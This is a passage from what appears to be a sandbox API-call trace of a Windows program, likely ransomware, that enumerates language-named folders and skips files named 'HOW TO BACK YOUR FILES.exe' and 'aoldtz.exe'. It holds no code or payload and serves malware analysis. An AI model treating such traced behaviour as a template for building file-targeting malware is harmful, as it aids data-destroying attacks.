lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869d6170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e3d0c00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e3d0c00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ca", cAlternateFileName="")) returned 1 [0100.785] lstrcmpiW (lpString1="ca", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.785] lstrcmpiW (lpString1="ca", lpString2="aoldtz.exe") returned 1 [0100.785] lstrcpyW (in: lpString1=0x2cce510, lpString2="ca" | out: lpString1="ca") returned="ca" [0100.785] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c08 [0100.785] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x116) returned 0x2e0960 [0100.785] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c10 | out: ListHead=0x2e7710, ListEntry=0x2e7c10) returned 0x2e7c50 [0100.785] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869b0010, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e3d0c00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e3d0c00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cs", cAlternateFileName="")) returned 1 [0100.785] lstrcmpiW (lpString1="cs", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.785] lstrcmpiW (lpString1="cs", lpString2="aoldtz.exe") returned 1 [0100.785] lstrcpyW (in: lpString1=0x2cce510, lpString2="cs" | out: lpString1="cs") returned="cs" [0100.785] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b28 [0100.785] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x116) returned 0x2e0a88 [0100.785] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b30 | out: ListHead=0x2e7710, ListEntry=0x2e7b30) returned 0x2e7c10 [0100.785] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86a22430, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e3d0c00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e3d0c00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="da", cAlternateFileName="")) returned 1 [0100.785] lstrcmpiW (lpString1="da", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.785] lstrcmpiW (lpString1="da", lpString2="aoldtz.exe") returned 1 [0100.785] lstrcpyW (in: lpString1=0x2cce510, lpString2="da" | out: lpString1="da") returned="da" [0100.785] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7be8 [0100.786] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x116) returned 0x2e0bb0 [0100.786] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bf0 | out: ListHead=0x2e7710, ListEntry=0x2e7bf0) returned 0x2e7b30 [0100.786] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869d6170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e3d0c00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e3d0c00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="de", cAlternateFileName="")) returned 1 [0100.786] lstrcmpiW (lpString1="de", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.786] lstrcmpiW (lpString1="de", lpString2="aoldtz.exe") returned 1 [0100.786] lstrcpyW (in: lpString1=0x2cce510, lpString2="de" | out: lpString1="de") returned="de" [0100.786] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2240 [0100.786] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x116) returned 0x2e0cd8 [0100.786] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2248 | out: ListHead=0x2e7710, ListEntry=0x2d2248) returned 0x2e7bf0 [0100.786] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869fc2d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e3aaaa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e3aaaa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="el", cAlternateFileName="")) returned 1 [0100.786] lstrcmpiW (lpString1="el", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.786] lstrcmpiW (lpString1="el", lpString2="aoldtz.exe") returned 1 [0100.786] lstrcpyW (in: lpString1=0x2cce510, lpString2="el" | out: lpString1="el") returned="el" [0100.786] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2580 [0100.786] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x116) returned 0x2e0e00 [0100.786] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2588 | out: ListHead=0x2e7710, ListEntry=0x2d2588) returned 0x2d2248 [0100.786] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86a22430, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e3aaaa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e3aaaa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0100.786] lstrcmpiW (lpString1="en", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.786] lstrcmpiW (lpString1="en", lpString2="aoldtz.exe") returned 1 [0100.787] lstrcpyW (in: lpString1=0x2cce510, lpString2="en" | out: lpString1="en") returned="en" [0100.787] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2560 [0100.787] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x116) returned 0x2e0f28 [0100.787] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2568 | out: ListHead=0x2e7710, ListEntry=0x2d2568) returned 0x2d2588 [0100.787] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869d6170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e3aaaa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e3aaaa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="es", cAlternateFileName="")) returned 1 [0100.787] lstrcmpiW (lpString1="es", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.787] lstrcmpiW (lpString1="es", lpString2="aoldtz.exe") returned 1 [0100.787] lstrcpyW (in: lpString1=0x2cce510, lpString2="es" | out: lpString1="es") returned="es" [0100.787] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d25e0 [0100.787] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x116) returned 0x2e1050 [0100.787] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d25e8 | out: ListHead=0x2e7710, ListEntry=0x2d25e8) returned 0x2d2568 [0100.787] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869fc2d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e3aaaa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e3aaaa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fi", cAlternateFileName="")) returned 1 [0100.787] lstrcmpiW (lpString1="fi", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.787] lstrcmpiW (lpString1="fi", lpString2="aoldtz.exe") returned 1 [0100.787] lstrcpyW (in: lpString1=0x2cce510, lpString2="fi" | out: lpString1="fi") returned="fi" [0100.787] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2600 [0100.787] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x116) returned 0x2e1178 [0100.787] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2608 | out: ListHead=0x2e7710, ListEntry=0x2d2608) returned 0x2d25e8 [0100.787] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869fc2d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e3aaaa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e3aaaa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fil", cAlternateFileName="")) returned 1 [0100.787] lstrcmpiW (lpString1="fil", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.787] lstrcmpiW (lpString1="fil", lpString2="aoldtz.exe") returned 1 [0100.787] lstrcpyW (in: lpString1=0x2cce510, lpString2="fil" | out: lpString1="fil") returned="fil" [0100.787] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2360 [0100.787] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x118) returned 0x2e12a0 [0100.787] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2368 | out: ListHead=0x2e7710, ListEntry=0x2d2368) returned 0x2d2608 [0100.788] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869d6170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e384940, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e384940, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fr", cAlternateFileName="")) returned 1 [0100.788] lstrcmpiW (lpString1="fr", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.788] lstrcmpiW (lpString1="fr", lpString2="aoldtz.exe") returned 1 [0100.788] lstrcpyW (in: lpString1=0x2cce510, lpString2="fr" | out: lpString1="fr") returned="fr" [0100.788] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2380 [0100.788] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x116) returned 0x2e13c8 [0100.788] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2388 | out: ListHead=0x2e7710, ListEntry=0x2d2388) returned 0x2d2368 [0100.788] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869b0010, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e384940, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e384940, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hi", cAlternateFileName="")) returned 1 [0100.788] lstrcmpiW (lpString1="hi", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.788] lstrcmpiW (lpString1="hi", lpString2="aoldtz.exe") returned 1 [0100.788] lstrcpyW (in: lpString1=0x2cce510, lpString2="hi" | out: lpString1="hi") returned="hi" [0100.788] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d23c0 [0100.788] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x116) returned 0x2e14f0 [0100.788] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d23c8 | out: ListHead=0x2e7710, ListEntry=0x2d23c8) returned 0x2d2388 [0100.788] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e2a0100, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4e2a0100, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0100.788] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0100.788] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869fc2d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e384940, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e384940, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hr", cAlternateFileName="")) returned 1 [0100.788] lstrcmpiW (lpString1="hr", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0100.788] lstrcmpiW (lpString1="hr", lpString2="aoldtz.exe") returned 1 [0100.788] lstrcpyW (in: lpString1=0x2cce510, lpString2="hr" | out: lpString1="hr") returned="hr" [0100.788] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d25a0 [0100.788] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x116) returned 0x2e1618 [0100.788] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d25a8 | out: ListHead=0x2e7710, ListEntry=0x2d25a8) returned 0x2d23c8 [0100.788] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869d6170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e384940, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e384940, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hu", cAlternateFileName="")) returned 1 [0100.788] lstrcmpiW (lpString1="hu", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0100.789] lstrcmpiW (lpString1="hu", lpString2="aoldtz.exe") returned 1 [0100.789] lstrcpyW (in: lpString1=0x2cce510, lpString2="hu" | out: lpString1="hu") returned="hu" [0100.789] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2280 [0100.789] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x116) returned 0x2e1740 [0100.789] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2288 | out: ListHead=0x2e7710, ListEntry=0x2d2288) returned 0x2d25a8 [0100.789] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86a22430, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e384940, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e384940, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="id", cAlternateFileName="")) returned 1 [0100.789] lstrcmpiW (lpString1="id", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0100.789] lstrcmpiW (lpString1="id", lpString2="aoldtz.exe") returned 1 [0100.790] lstrcpyW (in: lpString1=0x2cce510, lpString2="id" | out: lpString1="id") returned="id" [0100.790] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2620 [0100.790] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x116) returned 0x2e1868 [0100.790] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2628 | out: ListHead=0x2e7710, ListEntry=0x2d2628) returned 0x2d2288 [0100.790] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86a22430, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e35e7e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e35e7e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="it", cAlternateFileName="")) returned 1 [0100.790] lstrcmpiW (lpString1="it", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0100.790] lstrcmpiW (lpString1="it", lpString2="aoldtz.exe") returned 1 [0100.790] lstrcpyW (in: lpString1=0x2cce510, lpString2="it" | out: lpString1="it") returned="it" [0100.790] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d23a0 [0100.790] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x116) returned 0x2e1990 [0100.790] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d23a8 | out: ListHead=0x2e7710, ListEntry=0x2d23a8) returned 0x2d2628 [0100.790] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86a22430, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e35e7e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e35e7e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ja", cAlternateFileName="")) returned 1 [0100.790] lstrcmpiW (lpString1="ja", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0100.791] lstrcmpiW (lpString1="ja", lpString2="aoldtz.exe") returned 1 [0100.791] lstrcpyW (in: lpString1=0x2cce510, lpString2="ja" | out: lpString1="ja") returned="ja" [0100.791] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2260 [0100.791] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x116) returned 0x2e1ab8 [0100.791] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2268 | out: ListHead=0x2e7710, ListEntry=0x2d2268) returned 0x2d23a8 [0100.791] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869fc2d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e35e7e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e35e7e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ko", cAlternateFileName="")) returned 1 [0100.791] lstrcmpiW (lpString1="ko", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0100.791] lstrcmpiW (lpString1="ko", lpString2="aoldtz.exe") returned 1 [0100.791] lstrcpyW (in: lpString1=0x2cce510, lpString2="ko" | out: lpString1="ko") returned="ko" [0100.791] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d23e0 [0100.791] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x116) returned 0x2e1be0 [0100.791] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d23e8 | out: ListHead=0x2e7710, ListEntry=0x2d23e8) returned 0x2d2268 [0100.791] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869fc2d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e35e7e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e35e7e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lt", cAlternateFileName="")) returned 1 [0100.791] lstrcmpiW (lpString1="lt", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0100.791] lstrcmpiW (lpString1="lt", lpString2="aoldtz.exe") returned 1 [0100.791] lstrcpyW (in: lpString1=0x2cce510, lpString2="lt" | out: lpString1="lt") returned="lt" [0100.791] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2400 [0100.791] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x116) returned 0x2e1d08 [0100.791] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2408 | out: ListHead=0x2e7710, ListEntry=0x2d2408) returned 0x2d23e8 [0100.791] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869fc2d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e338680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e338680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lv", cAlternateFileName="")) returned 1 [0100.791] lstrcmpiW (lpString1="lv", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0100.791] lstrcmpiW (lpString1="lv", lpString2="aoldtz.exe") returned 1 [0100.792] lstrcpyW (in: lpString1=0x2cce510, lpString2="lv" | out: lpString1="lv") returned="lv" [0100.792] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2420 [0100.792] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x116) returned 0x2e1e30 [0100.792] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2428 | out: ListHead=0x2e7710, ListEntry=0x2d2428) returned 0x2d2408 [0100.792] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869d6170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e338680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e338680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nl", cAlternateFileName="")) returned 1 [0100.792] lstrcmpiW (lpString1="nl", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0100.792] lstrcmpiW (lpString1="nl", lpString2="aoldtz.exe") returned 1 [0100.792] lstrcpyW (in: lpString1=0x2cce510, lpString2="nl" | out: lpString1="nl") returned="nl" [0100.792] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2440 [0100.792] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x116) returned 0x2e1f58 [0100.792] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2448 | out: ListHead=0x2e7710, ListEntry=0x2d2448) returned 0x2d2428 [0100.792] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869fc2d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e338680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e338680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="no", cAlternateFileName="")) returned 1 [0100.792] lstrcmpiW (lpString1="no", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0100.792] lstrcmpiW (lpString1="no", lpString2="aoldtz.exe") returned 1 [0100.792] lstrcpyW (in: lpString1=0x2cce510, lpString2="no" | out: lpString1="no") returned="no" [0100.792] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2520 [0100.792] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x116) returned 0x2e2080 [0100.792] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2528 | out: ListHead=0x2e7710, ListEntry=0x2d2528) returned 0x2d2448 [0100.792] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869fc2d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e338680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e338680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pl", cAlternateFileName="")) returned 1 [0100.792] lstrcmpiW (lpString1="pl", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0100.792] lstrcmpiW (lpString1="pl", lpString2="aoldtz.exe") returned 1 [0100.792] lstrcpyW (in: lpString1=0x2cce510, lpString2="pl" | out: lpString1="pl") returned="pl" [0100.792] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2460 [0100.792] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x116) returned 0x2e21a8 [0100.792] 